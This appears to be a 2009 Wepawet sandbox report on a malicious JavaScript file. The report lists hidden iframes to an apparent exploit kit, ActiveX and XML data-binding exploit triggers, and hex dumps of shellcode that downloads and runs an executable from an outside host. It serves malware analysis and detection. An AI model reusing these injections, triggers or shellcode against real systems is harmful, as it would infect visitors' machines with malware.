Wepawet » JavaScript Report for http://a0v.org/x.js

Analysis report for http://a0v.org/x.js

Sample Overview

URL	http://a0v.org/x.js
MD5	ae563af77535163a1562cc1106ddf342
Analysis Started	2009-08-03 10:07:01
Report Generated	2009-08-03 10:08:20
Jsand version	1.03.02

See the report for domain a0v.org.

Detection results

Detector	Result
Jsand 1.03.02	suspicious

Exploits

No exploits were identified.

Deobfuscation results

Evals

new ActiveXObject('ShockwaveFlash.ShockwaveFlash.10');

(repeated 1 time)

Writes

<iframe src=http://game158.info/oday/index.html width=0 height=0></iframe>

(repeated 1 time)

<script type="text/javascript" src="http://js.tongji.linezing.com/1189582/tongji.js"></script>

(repeated 1 time)

<iframe width=100 height=0 src=NyNtDfll.htm></iframe>

(repeated 1 time)

<iframe width=100 height=0 src=of.htm></iframe>

(repeated 1 time)

<iframe src=nYnTdi.htm width=100 height=0></iframe>

(repeated 1 time)

<a href="http://www.51.la/?003088523" target="_blank"><img alt=
"&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065
;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style=
"border:none" /></a>

(repeated 1 time)

<img style="width:0px;height:0px" src=
"http://web.51.la/go.asp?svid=53&id=3088523&tpages=1&ttimes=1&tzone=-7&tcolor=24&sSize=1024,768&refe
rrer=&vpage=http%3A//game158.info/oday/index.html" />

(repeated 1 time)

<div style=display:none><XML ID=I><X><C>
<![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.cOm]]><![CDATA[>]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=
C DATAFORMATAS=HTML></SPAN></div>

(repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://a0v.org/x.js	200	text/javascript
about:blank	200	text/html
http://js.tongji.linezing.com/1189582/tongji.js	200	text/javascript
http://game158.info/oday/index.html	200	text/javascript
http://js.users.51.la/3088523.js	200	text/javascript
http://game158.info/oday/NyNtDfll.htm	200	text/javascript
http://game158.info/oday/yt.jpg	200	text/html
http://game158.info/oday/of.htm	200	text/javascript
http://game158.info/oday/of.js	200	text/javascript
http://game158.info/oday/of1.css	200	text/javascript
http://game158.info/oday/nYnTdi.htm	200	text/javascript
http://game158.info/oday/avast.js	200	text/javascript
http://dt.tongji.linezing.com/ystat.do?unit_id=1189582&uv=14014297631377503310&nuv=1&cna=undefined&cg=0&mid=undefined&mmland=0&ade=undefined&adtm=undefined&sttm=undefined&mmtrace=button&ss=0_1249294086_496125203&usn=0&ec=1&ref=&url=&dom=a0v.org&host=a0v.org&nac=&agt=&clr=&scr=&lng=&jvm=&flu=&tm=1249318508&tc=e6d0c816&ut=0&cnu=0.13584526023800725	200	application/x-empty
http://dt.tongji.linezing.com/ystat.do?unit_id=1189582&uv=14014297631377503310&nuv=1&cna=undefined&cg=0&mid=undefined&mmland=0&ade=undefined&adtm=undefined&sttm=undefined&mmtrace=button&ss=0_1249294086_496125203&usn=0&ec=1&ref=&url=&dom=a0v.org&host=a0v.org&nac=&agt=&clr=&scr=&lng=&jvm=&flu=&tm=1249318508&tc=e6d0c816&ut=0&cnu=0.3835370573780723	Error	application/x-empty

Redirects

No redirects.

ActiveX controls

OWC10.Spreadsheet
	Name	Arg0	Count
Methods	msDataSourceObject	[object Window]	10
	Evaluate	[object Window]	10
		0.0	10
		2.0	10
		1.0	10

ShockwaveFlash.ShockwaveFlash.10

No attribute setting or method call detected

ShockwaveFlash.ShockwaveFlash.10
No attribute setting or method call detected

Shellcode and Malware

Hexadecimal	ASCII
90 90 90 90 90 90 d9 e1 d9 34 24 58 58 58 58 33 db b3 1c 03 c3 31 c9 66 81 e9 65 fa 80 30 21 40 e2 fa c9 17 22 21 21 49 21 01 21 21 4b 21 de f1 98 21 31 21 21 aa d9 ca 24 7f d2 85 de f1 c9 d7 de de de c9 1c 22 21 21 aa d9 c9 19 21 21 21 c9 6c 20 21 21 c9 67 21 21 21 c9 fa 22 21 21 aa d9 c9 03 21 21 21 c9 65 20 21 21 c9 11 21 21 21 c9 a8 22 21 21 aa d9 c9 2d 21 21 21 c9 40 20 21 21 c9 3b 21 21 21 ca 79 72 aa fd 72 4b 61 49 21 31 21 21 76 c9 90 23 21 21 c9 c4 21 21 21 79 e2 72 aa fd 72 4b 01 49 21 31 21 21 76 c9 b8 23 21 21 c9 ec 21 21 21 79 e2 76 c9 1d 25 21 21 aa d9 12 e8 68 12 e1 91 e2 dd d3 8f ac 66 de 7e e2 7a 1f e7 26 99 1f a8 7e 20 47 1f e6 66 24 de c1 e2 c8 b4 25 21 21 7a a0 cd 35 20 21 21 aa f5 1f e6 23 42 4c 45 01 1f e6 63 25 0e 42 01 03 a2 e3 29 12 e1 71 71 49 25 20 21 21 73 72 71 c9 e0 22 21 21 de f1 aa dd aa e6 a2 e1 29 1f ab 39 a5 fa 55 22 61 ca d7 1f e7 21 03 12 f3 1f a9 71 20 a2 cd 75 12 e1 12 fa aa ed a2 d9 75 5c 28 1f a8 3d 20 a2 e1 25 ca d3 aa ed aa f8 a2 e2 31 12 e1 1f e6 62 0d 20 21 21 21 70 72 71 71 71 71 71 71 76 71 c9 18 22 21 21 c9 38 21 21 21 45 80 25 21 21 21 ac 81 41 de de de c9 16 22 21 21 12 fa 72 72 72 72 de f1 a1 19 c9 a1 19 c8 54 2e a0 59 24 b1 b1 b1 b1 55 27 74 aa cd ac 61 24 de c1 c9 0f de de de e2 c9 09 de de de 99 30 20 25 a1 e3 2d 21 c9 3a de de de 12 e1 71 75 c9 75 21 21 21 71 c9 aa 23 21 21 de f1 17 a1 1d 05 21 56 2b c9 60 23 21 21 12 de 76 de f1 c9 da 20 21 21 49 de 21 21 21 de f1 c9 c9 df de de 72 76 77 12 e1 71 75 c9 3f 21 21 21 71 c9 74 23 21 21 de f1 17 a1 1d 05 21 56 2b c9 2a 23 21 21 12 de 76 de f1 79 7f 7e 7a e2 ca 23 79 e2 c9 d8 de de de 77 76 a2 cd 29 aa dd 4b 29 76 1f de 56 35 c9 7c 23 21 21 de f1 aa dd 49 40 4c 44 21 49 68 64 67 53 aa d5 98 29 21 21 21 d2 87 54 0e 4b 21 1f de 55 05 01 c9 05 23 21 21 de f1 aa d9 c9 ea 20 21 21 de f1 1a d9 55 29 17 aa 65 05 01 1f de 21 1f de 55 05 3d c9 ce 20 21 21 de f1 a2 e5 31 7e 7f 99 20 21 21 21 e2 49 4e 4f 21 21 49 54 53 4d 4c ca 34 ac 65 05 25 71 c9 03 df de de 71 c9 6b 23 21 21 c8 c3 df de de c9 c7 de de de a2 e5 29 e2 4b 4d 49 4f 55 45 4d ca 34 ac 65 05 25 71 c9 da dc de de 71 c9 02 23 21 21 c8 9a df de de c9 c7 de de de a2 e5 29 e2 49 12 13 21 21 49 54 52 44 53 ca 34 ac 65 05 25 71 c9 f0 dc de de 71 c9 d8 20 21 21 c8 b0 df de de c9 c7 de de de a2 e5 29 e2 49 42 57 56 21 49 52 49 45 4e ca 34 ac 65 05 25 71 c9 86 dc de de 71 c9 ee 20 21 21 c8 46 df de de c9 c7 de de de a2 e5 29 e2 49 57 46 59 21 ca 34 ac 65 05 25 71 c9 a3 dc de de 71 c9 8b 20 21 21 c8 63 df de de c9 c7 de de de a2 e5 25 e2 c9 8a 20 21 21 49 3a e7 67 58 71 c9 e7 20 21 21 a2 e5 29 e2 c9 b6 20 21 21 49 cd b6 22 2d 71 c9 93 20 21 21 a2 e5 29 e2 c9 a2 20 21 21 49 8b dd 2c 5d 71 c9 bf 20 21 21 a2 e5 29 e2 c9 4e 20 21 21 49 cc 77 ce 17 71 c9 ab 20 21 21 a2 e5 29 e2 c9 7a 20 21 21 49 d1 ab 25 7e 71 c9 57 20 21 21 a2 e5 29 e2 c9 d6 df de de 49 59 49 fa 3d 71 c9 43 20 21 21 a2 e5 29 e2 c9 12 20 21 21 49 ce ef c1 41 71 c9 6f 20 21 21 a2 e5 29 e2 c9 3e 20 21 21 49 91 68 0c fa 71 c9 1b 20 21 21 a2 e5 29 e2 c9 17 de de de 49 8a 7f ba 3f 71 c9 07 20 21 21 a2 e5 29 e2 c9 86 df de de 49 78 b6 a0 23 71 c9 33 20 21 21 a2 e5 29 e2 c9 c2 21 21 21 49 5f f9 c3 52 71 c9 df 21 21 21 a2 e5 29 e2 c9 ee 21 21 21 49 bf d8 9a 14 71 c9 cb 21 21 21 a2 e5 29 e2 c9 b3 df de de 49 76 81 94 9a 71 c9 f7 21 21 21 a2 e5 29 e2 c9 5f df de de 49 3b 5b 3f 23 71 c9 e3 21 21 21 a2 e5 29 e2 c9 4b df de de 49 c1 7a 11 b5 71 c9 8f 21 21 21 a2 e5 29 e2 c9 77 df de de 49 b6 e8 c3 82 71 c9 bb 21 21 21 a2 e5 29 e2 c9 63 df de de 49 49 05 e4 92 71 c9 a7 21 21 21 a2 e5 29 e2 c9 76 21 21 21 49 53 df 92 37 71 c9 53 21 21 21 a2 e5 29 e2 c9 65 df de de ca 32 4b 44 71 c9 d6 da de de 71 c9 8a df de de c8 96 dd de de c9 c9 de de de e2 c9 88 dc de de 49 6e ce 6e 24 71 c9 1f 21 21 21 a2 e5 29 e2 c9 2e 21 21 21 49 af 6f 2f cd 71 c9 0b 21 21 21 a2 e5 29 e2 12 e1 45 aa 61 11 a4 e1 59 31 1f aa 61 2d 1f aa 51 3d 8c 1f aa 61 29 e2 ca 2a 1f aa 61 15 a2 e1 5d 1f aa 61 1d e2 41 17 aa 4d 05 05 17 aa 64 1d 17 aa 75 24 59 22 f4 1f aa 6b 39 1f aa 7b 01 22 fc c2 1a 68 1f aa 15 aa 22 d4 12 de 12 e1 dd 8d a5 e1 55 26 e0 ee 2c 22 d9 ca d5 17 1a 5d 05 09 54 fe 1f aa 7b 05 22 fc 47 1f aa 2d 6a 1f aa 7b 3d 22 fc 1f aa 25 aa 22 e4 17 a8 65 05 3d 40 e2 c9 47 da de de 49 55 55 51 1b 0e 0e 56 56 56 0f 56 4e 56 58 44 52 46 4e 0f 48 4f 47 4e 0e 4c 40 4c 0f 44 59 44 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 00	.........4$XXXX3 .....1.f..e..0!@ ...."!!I!.!!K!.. .!1!!...$....... ....."!!....!!!. l !!.g!!!.."!!.. ..!!!.e !!..!!!. ."!!...-!!!.@ !! .;!!!.yr..rKaI!1 !!v..#!!..!!!y.r ..rK.I!1!!v..#!! ..!!!y.v..%!!... .h........f.~.z. .&...~ G..f$.... .%!!z..5 !!....# BLE...c%.B....). .qqI% !!srq.."!! ........)..9..U" a....!.....q ..u ........u\(..= . .%........1....b . !!!prqqqqqqvq. ."!!.8!!!E.%!!!. .A....."!!..rrrr ........T..Y$... .U't...a$....... .......0 %..-!.: .....qu.u!!!q..# !!......!V+.`#!! ..v.... !!I.!!!. ......rvw..qu.?! !!q.t#!!......!V +.#!!..v..y.~z. .#y......wv..).. K)v..V5.\|#!!.... I@LD!IhdgS...)!! !..T.K!..U....#! !...... !!....U) ..e....!..U.=.. !!....1~.. !!!.I NO!!ITSML.4.e.%q .....q.k#!!..... .......).KMIOUEM .4.e.%q.....q..# !!............). I..!!ITRDS.4.e.% q.....q.. !!.... ........).IBWV!I RIEN.4.e.%q..... q.. !!.F........ ..).IWFY!.4.e.%q .....q.. !!.c... .......%... !!I: .gXq.. !!..)... !!I.."-q.. !!..) ... !!I..,]q.. ! !..)..N !!I.w..q .. !!..)..z !!I. .%~q.W !!..).... ..IYI.=q.C !!..) ... !!I...Aq.o ! !..)..> !!I.h..q .. !!..)......I. ..?q.. !!..).... ..Ix..#q.3 !!..) ...!!!I_..Rq..!! !..)...!!!I....q ..!!!..)......Iv ...q..!!!..).._. ..I;[?#q..!!!..) ..K...I.z..q..!! !..)..w...I....q ..!!!..)..c...II ...q..!!!..)..v! !!IS..7q.S!!!..) ..e....2KDq..... q............... ......In.n$q..!! !..)...!!!I.o/.q ..!!!..)...E.a.. .Y1..a-..Q=...a) ....a...]..a..A ..M....d...u$Y". ..k9..{."...h... .".........U&.., ".....]..T...{." .G..-j..{="...%. "...e.=@..G...IU UQ...VVV.VNVXDRF N.HOGN.L@L.DYD!! !!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!! !!!!!!!.
90 e8 4d 03 00 00 68 00 20 00 00 6a 00 ff d0 b9 00 08 00 00 8b f8 eb 05 5e f3 a4 ff d0 e8 f6 ff ff ff e8 54 03 00 00 8b f8 e8 38 00 00 00 e8 64 01 00 00 e8 46 00 00 00 e8 f2 03 00 00 8b f8 e8 22 00 00 00 e8 5b 01 00 00 e8 30 00 00 00 e8 a0 03 00 00 8b f8 e8 0c 00 00 00 e8 78 01 00 00 e8 1a 00 00 00 eb 58 53 8b dc 53 6a 40 68 00 10 00 00 57 e8 c8 02 00 00 e8 fa 00 00 00 58 c3 53 8b dc 53 6a 20 68 00 10 00 00 57 e8 b0 02 00 00 e8 e2 00 00 00 58 c3 57 e8 53 04 00 00 8b f8 33 c9 49 33 c0 b0 c3 fc f2 ae 8d 47 ff 5f c3 5b 3e c6 07 b8 3e 89 5f 01 66 3e c7 47 05 ff e0 c3 e9 ac 04 00 00 5b 81 ec 14 01 00 00 8b d4 3e c7 02 63 6d 64 20 3e c7 42 04 2f 63 20 22 3e c7 42 08 63 6d 64 20 3e c7 42 0c 2f 63 20 22 83 c2 10 33 c0 50 50 68 04 01 00 00 52 53 50 e8 c8 03 00 00 e8 72 00 00 00 8b fc 8b c7 83 c0 08 3e 8a 18 84 db 74 03 40 eb f6 66 3e c7 00 22 22 33 d2 3e 88 50 02 83 ec 54 33 c0 33 db 8b cc 83 f8 54 7d 09 3e 89 1c 08 83 c0 04 eb f2 8b cc 8b d9 83 c3 10 33 c0 3e c7 43 2c 01 00 00 00 51 53 50 50 50 50 50 50 57 50 e8 3b 03 00 00 e8 19 00 00 00 64 a1 04 00 00 00 8d a0 60 ff ff ff e8 39 03 00 00 33 db 53 53 53 53 ff d0 80 38 e9 74 05 80 38 e8 75 0f 81 78 05 90 90 41 90 74 06 55 8b ec 8d 40 05 ff e0 e8 17 ff ff ff c3 e8 11 ff ff ff b8 11 01 04 80 c2 0c 00 e8 04 ff ff ff 33 c0 50 54 e8 54 00 00 00 50 e8 8b 02 00 00 ff d0 36 80 3c 24 00 77 0a e8 41 02 00 00 33 ff 57 ff d0 e8 fb 01 00 00 68 ff 00 00 00 ff d0 e8 d1 fe ff ff 53 57 56 33 c0 50 54 e8 1e 00 00 00 50 e8 55 02 00 00 ff d0 36 80 3c 24 00 77 0a e8 0b 02 00 00 33 ff 57 ff d0 58 5e 5f 5b c3 eb 02 58 c3 e8 f9 ff ff ff 56 57 83 ec 08 8b fc 6a 08 57 3e ff 77 14 e8 5d 02 00 00 ff d0 8b fc 68 61 6d 65 00 68 49 45 46 72 8b f4 b9 08 00 00 00 f3 a6 75 2f 6a 00 3e ff 74 24 20 e8 24 02 00 00 ff d0 8b f8 e8 cb 01 00 00 ff d0 3b f8 74 08 36 8b 44 24 20 3e ff 00 3e ff 74 24 1c e8 ef 01 00 00 ff d0 83 c4 10 5f 5e b8 01 00 00 00 c3 68 6f 6e 00 00 68 75 72 6c 6d eb 15 8d 44 24 04 50 e8 0b fe ff ff 50 e8 4a 02 00 00 e9 e0 fe ff ff e8 e6 ff ff ff 83 c4 08 c3 6a 6c 68 6e 74 64 6c eb 15 8d 44 24 04 50 e8 e4 fd ff ff 50 e8 23 02 00 00 e9 b9 fe ff ff e8 e6 ff ff ff 83 c4 08 c3 68 33 32 00 00 68 75 73 65 72 eb 15 8d 44 24 04 50 e8 ba fd ff ff 50 e8 f9 01 00 00 e9 8f fe ff ff e8 e6 ff ff ff 83 c4 08 c3 68 63 76 77 00 68 73 68 64 6f eb 15 8d 44 24 04 50 e8 90 fd ff ff 50 e8 cf 01 00 00 e9 65 fe ff ff e8 e6 ff ff ff 83 c4 08 c3 68 76 67 78 00 eb 15 8d 44 24 04 50 e8 6b fd ff ff 50 e8 aa 01 00 00 e9 40 fe ff ff e8 e6 ff ff ff 83 c4 04 c3 e8 ab 01 00 00 68 1b c6 46 79 50 e8 c6 01 00 00 83 c4 08 c3 e8 97 01 00 00 68 ec 97 03 0c 50 e8 b2 01 00 00 83 c4 08 c3 e8 83 01 00 00 68 aa fc 0d 7c 50 e8 9e 01 00 00 83 c4 08 c3 e8 6f 01 00 00 68 ed 56 ef 36 50 e8 8a 01 00 00 83 c4 08 c3 e8 5b 01 00 00 68 f0 8a 04 5f 50 e8 76 01 00 00 83 c4 08 c3 e8 f7 fe ff ff 68 78 68 db 1c 50 e8 62 01 00 00 83 c4 08 c3 e8 33 01 00 00 68 ef ce e0 60 50 e8 4e 01 00 00 83 c4 08 c3 e8 1f 01 00 00 68 b0 49 2d db 50 e8 3a 01 00 00 83 c4 08 c3 e8 36 ff ff ff 68 ab 5e 9b 1e 50 e8 26 01 00 00 83 c4 08 c3 e8 a7 fe ff ff 68 59 97 81 02 50 e8 12 01 00 00 83 c4 08 c3 e8 e3 00 00 00 68 7e d8 e2 73 50 e8 fe 00 00 00 83 c4 08 c3 e8 cf 00 00 00 68 9e f9 bb 35 50 e8 ea 00 00 00 83 c4 08 c3 e8 92 fe ff ff 68 57 a0 b5 bb 50 e8 d6 00 00 00 83 c4 08 c3 e8 7e fe ff ff 68 1a 7a 1e 02 50 e8 c2 00 00 00 83 c4 08 c3 e8 6a fe ff ff 68 e0 5b 30 94 50 e8 ae 00 00 00 83 c4 08 c3 e8 56 fe ff ff 68 97 c9 e2 a3 50 e8 9a 00 00 00 83 c4 08 c3 e8 42 fe ff ff 68 68 24 c5 b3 50 e8 86 00 00 00 83 c4 08 c3 e8 57 00 00 00 68 72 fe b3 16 50 e8 72 00 00 00 83 c4 08 c3 e8 44 fe ff ff eb 13 6a 65 50 e8 e0 fb ff ff 50 e8 ab fe ff ff e9 b5 fc ff ff e8 e8 ff ff ff c3 e8 a9 fd ff ff 68 4f ef 4f 05 50 e8 3e 00 00 00 83 c4 08 c3 e8 0f 00 00 00 68 8e 4e 0e ec 50 e8 2a 00 00 00 83 c4 08 c3 33 c0 64 8b 40 30 85 c0 78 10 3e 8b 40 0c 3e 8b 70 1c ad 3e 8b 40 08 c3 eb 0b 3e 8b 40 34 83 c0 7c 3e 8b 40 3c c3 60 36 8b 6c 24 24 36 8b 45 3c 36 8b 54 28 78 03 d5 3e 8b 4a 18 3e 8b 5a 20 03 dd e3 3b 49 3e 8b 34 8b 03 f5 33 ff 33 c0 fc ac 84 c0 74 07 c1 cf 0d 03 f8 eb f4 36 3b 7c 24 28 75 df 3e 8b 5a 24 03 dd 66 3e 8b 0c 4b 3e 8b 5a 1c 03 dd 3e 8b 04 8b 03 c5 36 89 44 24 1c 61 c3 e8 4f fb ff ff 68 74 74 70 3a 2f 2f 77 77 77 2e 77 6f 77 79 65 73 67 6f 2e 69 6e 66 6f 2f 6d 61 6d 2e 65 78 65 00 00	..M...h. ..j.... ........^....... ...T......8....d ....F........... "....[....0..... ...........x.... .....XS..Sj@h... .W..........X.S. .Sj h....W...... ....X.W.S.....3. I3.......G._.[>. ..>._.f>.G...... ...[........>..c md >.B./c ">.B.c md >.B./c "...3. PPh....RSP...... r..........>.... t.@..f>..""3.>.P ...T3.3.....T}.> ...............3 .>.C,....QSPPPPP PWP.;........d.. .....`....9...3. SSSS...8.t..8.u. .x...A.t.U...@.. ................ .........3.PT.T. ..P.......6.<$.w ..A...3.W....... h...........SWV3 .PT.....P.U..... 6.<$.w......3.W. .X^_[...X......V W.....j.W>.w..]. ......hame.hIEFr .........u/j.>.t $ .$............ ..;.t.6.D$ >..>. t$..........._^. .....hon..hurlm. ..D$.P.....P.J.. ...............j lhntdl...D$.P... ..P.#........... ......h32..huser ...D$.P.....P... ................ hcvw.hshdo...D$. P.....P......e.. ..........hvgx.. ..D$.P.k...P.... ..@............. ....h..FyP...... ........h....P.. ............h... \|P..........o... h.V.6P.......... [...h..._P.v.... ........hxh..P.b ........3...h... `P.N............ h.I-.P.:........ 6...h.^..P.&.... ........hY...P.. ............h~.. sP.............. h...5P.......... ....hW...P...... ....~...h.z..P.. ........j...h.[0 .P..........V... h....P.......... B...hh$..P...... ....W...hr...P.r ........D.....je P.....P......... ............hO.O .P.>............ h.N..P.*.......3 .d.@0..x.>.@.>.p ..>.@....>.@4..\| >.@<.`6.l$$6.E<6 .T(x..>.J.>.Z .. .;I>.4...3.3.... .t........6;\|$(u .>.Z$..f>..K>.Z. ..>.....6.D$.a.. O...http://www.w owyesgo.info/mam .exe..

Hexadecimal

ASCII

90 90 90 90 90 90 d9 e1  d9 34 24 58 58 58 58 33 
db b3 1c 03 c3 31 c9 66  81 e9 65 fa 80 30 21 40 
e2 fa c9 17 22 21 21 49  21 01 21 21 4b 21 de f1 
98 21 31 21 21 aa d9 ca  24 7f d2 85 de f1 c9 d7 
de de de c9 1c 22 21 21  aa d9 c9 19 21 21 21 c9 
6c 20 21 21 c9 67 21 21  21 c9 fa 22 21 21 aa d9 
c9 03 21 21 21 c9 65 20  21 21 c9 11 21 21 21 c9 
a8 22 21 21 aa d9 c9 2d  21 21 21 c9 40 20 21 21 
c9 3b 21 21 21 ca 79 72  aa fd 72 4b 61 49 21 31 
21 21 76 c9 90 23 21 21  c9 c4 21 21 21 79 e2 72 
aa fd 72 4b 01 49 21 31  21 21 76 c9 b8 23 21 21 
c9 ec 21 21 21 79 e2 76  c9 1d 25 21 21 aa d9 12 
e8 68 12 e1 91 e2 dd d3  8f ac 66 de 7e e2 7a 1f 
e7 26 99 1f a8 7e 20 47  1f e6 66 24 de c1 e2 c8 
b4 25 21 21 7a a0 cd 35  20 21 21 aa f5 1f e6 23 
42 4c 45 01 1f e6 63 25  0e 42 01 03 a2 e3 29 12 
e1 71 71 49 25 20 21 21  73 72 71 c9 e0 22 21 21 
de f1 aa dd aa e6 a2 e1  29 1f ab 39 a5 fa 55 22 
61 ca d7 1f e7 21 03 12  f3 1f a9 71 20 a2 cd 75 
12 e1 12 fa aa ed a2 d9  75 5c 28 1f a8 3d 20 a2 
e1 25 ca d3 aa ed aa f8  a2 e2 31 12 e1 1f e6 62 
0d 20 21 21 21 70 72 71  71 71 71 71 71 76 71 c9 
18 22 21 21 c9 38 21 21  21 45 80 25 21 21 21 ac 
81 41 de de de c9 16 22  21 21 12 fa 72 72 72 72 
de f1 a1 19 c9 a1 19 c8  54 2e a0 59 24 b1 b1 b1 
b1 55 27 74 aa cd ac 61  24 de c1 c9 0f de de de 
e2 c9 09 de de de 99 30  20 25 a1 e3 2d 21 c9 3a 
de de de 12 e1 71 75 c9  75 21 21 21 71 c9 aa 23 
21 21 de f1 17 a1 1d 05  21 56 2b c9 60 23 21 21 
12 de 76 de f1 c9 da 20  21 21 49 de 21 21 21 de 
f1 c9 c9 df de de 72 76  77 12 e1 71 75 c9 3f 21 
21 21 71 c9 74 23 21 21  de f1 17 a1 1d 05 21 56 
2b c9 2a 23 21 21 12 de  76 de f1 79 7f 7e 7a e2 
ca 23 79 e2 c9 d8 de de  de 77 76 a2 cd 29 aa dd 
4b 29 76 1f de 56 35 c9  7c 23 21 21 de f1 aa dd 
49 40 4c 44 21 49 68 64  67 53 aa d5 98 29 21 21 
21 d2 87 54 0e 4b 21 1f  de 55 05 01 c9 05 23 21 
21 de f1 aa d9 c9 ea 20  21 21 de f1 1a d9 55 29 
17 aa 65 05 01 1f de 21  1f de 55 05 3d c9 ce 20 
21 21 de f1 a2 e5 31 7e  7f 99 20 21 21 21 e2 49 
4e 4f 21 21 49 54 53 4d  4c ca 34 ac 65 05 25 71 
c9 03 df de de 71 c9 6b  23 21 21 c8 c3 df de de 
c9 c7 de de de a2 e5 29  e2 4b 4d 49 4f 55 45 4d 
ca 34 ac 65 05 25 71 c9  da dc de de 71 c9 02 23 
21 21 c8 9a df de de c9  c7 de de de a2 e5 29 e2 
49 12 13 21 21 49 54 52  44 53 ca 34 ac 65 05 25 
71 c9 f0 dc de de 71 c9  d8 20 21 21 c8 b0 df de 
de c9 c7 de de de a2 e5  29 e2 49 42 57 56 21 49 
52 49 45 4e ca 34 ac 65  05 25 71 c9 86 dc de de 
71 c9 ee 20 21 21 c8 46  df de de c9 c7 de de de 
a2 e5 29 e2 49 57 46 59  21 ca 34 ac 65 05 25 71 
c9 a3 dc de de 71 c9 8b  20 21 21 c8 63 df de de 
c9 c7 de de de a2 e5 25  e2 c9 8a 20 21 21 49 3a 
e7 67 58 71 c9 e7 20 21  21 a2 e5 29 e2 c9 b6 20 
21 21 49 cd b6 22 2d 71  c9 93 20 21 21 a2 e5 29 
e2 c9 a2 20 21 21 49 8b  dd 2c 5d 71 c9 bf 20 21 
21 a2 e5 29 e2 c9 4e 20  21 21 49 cc 77 ce 17 71 
c9 ab 20 21 21 a2 e5 29  e2 c9 7a 20 21 21 49 d1 
ab 25 7e 71 c9 57 20 21  21 a2 e5 29 e2 c9 d6 df 
de de 49 59 49 fa 3d 71  c9 43 20 21 21 a2 e5 29 
e2 c9 12 20 21 21 49 ce  ef c1 41 71 c9 6f 20 21 
21 a2 e5 29 e2 c9 3e 20  21 21 49 91 68 0c fa 71 
c9 1b 20 21 21 a2 e5 29  e2 c9 17 de de de 49 8a 
7f ba 3f 71 c9 07 20 21  21 a2 e5 29 e2 c9 86 df 
de de 49 78 b6 a0 23 71  c9 33 20 21 21 a2 e5 29 
e2 c9 c2 21 21 21 49 5f  f9 c3 52 71 c9 df 21 21 
21 a2 e5 29 e2 c9 ee 21  21 21 49 bf d8 9a 14 71 
c9 cb 21 21 21 a2 e5 29  e2 c9 b3 df de de 49 76 
81 94 9a 71 c9 f7 21 21  21 a2 e5 29 e2 c9 5f df 
de de 49 3b 5b 3f 23 71  c9 e3 21 21 21 a2 e5 29 
e2 c9 4b df de de 49 c1  7a 11 b5 71 c9 8f 21 21 
21 a2 e5 29 e2 c9 77 df  de de 49 b6 e8 c3 82 71 
c9 bb 21 21 21 a2 e5 29  e2 c9 63 df de de 49 49 
05 e4 92 71 c9 a7 21 21  21 a2 e5 29 e2 c9 76 21 
21 21 49 53 df 92 37 71  c9 53 21 21 21 a2 e5 29 
e2 c9 65 df de de ca 32  4b 44 71 c9 d6 da de de 
71 c9 8a df de de c8 96  dd de de c9 c9 de de de 
e2 c9 88 dc de de 49 6e  ce 6e 24 71 c9 1f 21 21 
21 a2 e5 29 e2 c9 2e 21  21 21 49 af 6f 2f cd 71 
c9 0b 21 21 21 a2 e5 29  e2 12 e1 45 aa 61 11 a4 
e1 59 31 1f aa 61 2d 1f  aa 51 3d 8c 1f aa 61 29 
e2 ca 2a 1f aa 61 15 a2  e1 5d 1f aa 61 1d e2 41 
17 aa 4d 05 05 17 aa 64  1d 17 aa 75 24 59 22 f4 
1f aa 6b 39 1f aa 7b 01  22 fc c2 1a 68 1f aa 15 
aa 22 d4 12 de 12 e1 dd  8d a5 e1 55 26 e0 ee 2c 
22 d9 ca d5 17 1a 5d 05  09 54 fe 1f aa 7b 05 22 
fc 47 1f aa 2d 6a 1f aa  7b 3d 22 fc 1f aa 25 aa 
22 e4 17 a8 65 05 3d 40  e2 c9 47 da de de 49 55 
55 51 1b 0e 0e 56 56 56  0f 56 4e 56 58 44 52 46 
4e 0f 48 4f 47 4e 0e 4c  40 4c 0f 44 59 44 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 00

.........4$XXXX3
.....1.f..e..0!@
...."!!I!.!!K!..
.!1!!...$.......
....."!!....!!!.
l !!.g!!!.."!!..
..!!!.e !!..!!!.
."!!...-!!!.@ !!
.;!!!.yr..rKaI!1
!!v..#!!..!!!y.r
..rK.I!1!!v..#!!
..!!!y.v..%!!...
.h........f.~.z.
.&...~ G..f$....
.%!!z..5 !!....#
BLE...c%.B....).
.qqI% !!srq.."!!
........)..9..U"
a....!.....q ..u
........u\(..= .
.%........1....b
. !!!prqqqqqqvq.
."!!.8!!!E.%!!!.
.A....."!!..rrrr
........T..Y$...
.U't...a$.......
.......0 %..-!.:
.....qu.u!!!q..#
!!......!V+.`#!!
..v.... !!I.!!!.
......rvw..qu.?!
!!q.t#!!......!V
+.*#!!..v..y.~z.
.#y......wv..)..
K)v..V5.|#!!....
I@LD!IhdgS...)!!
!..T.K!..U....#!
!...... !!....U)
..e....!..U.=.. 
!!....1~.. !!!.I
NO!!ITSML.4.e.%q
.....q.k#!!.....
.......).KMIOUEM
.4.e.%q.....q..#
!!............).
I..!!ITRDS.4.e.%
q.....q.. !!....
........).IBWV!I
RIEN.4.e.%q.....
q.. !!.F........
..).IWFY!.4.e.%q
.....q.. !!.c...
.......%... !!I:
.gXq.. !!..)... 
!!I.."-q.. !!..)
